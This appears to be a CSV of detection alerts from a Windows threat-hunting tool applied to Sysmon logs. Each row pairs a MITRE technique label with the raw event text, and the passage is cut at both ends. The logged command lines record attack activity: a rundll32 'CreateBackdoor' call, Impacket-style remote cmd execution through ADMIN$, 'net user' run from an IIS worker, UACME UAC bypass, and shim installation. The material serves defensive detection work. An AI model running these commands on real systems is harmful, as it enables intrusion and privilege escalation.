AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-00102CF20000 + 1180 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + 
C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® 
Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + 
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:33:57.876 + 747F3D96-A685-5D46-0000-00100D41D703 + 3296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A685-5D46-0000-00109B2AD703 + 3916 
+ C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 55 c:\Windows\SysWOW64\notepad.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 578500 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2021-04-20 20:33:59.834 + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49925 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + 
C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + 
Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966408 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:44.712 + 365ABB72-55E8-5C91-0000-001037DF0700 + 4052 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured 
-Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-10 11:18:54.576 + 747F3D96-041E-5FD2-0000-001024DF3B00 + 5580 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-7E79-5FD2-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 832 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578499 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:00.318 + 747F3D96-3A7C-607F-0000-001058067700 + 2740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\user03 + 747F3D96-3A7C-607F-0000-002075057700 + 0x770575 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s 
-NoLogo -NoProfile + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 337 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.978 + 747F3D96-2842-5E1E-0000-0010745E7A00 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,FileProtocolHandler ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9833 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:12.340 + 365ABB72-B180-5CC8-0000-00102BB71E00 + 1504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\windows\system32\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 
0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + 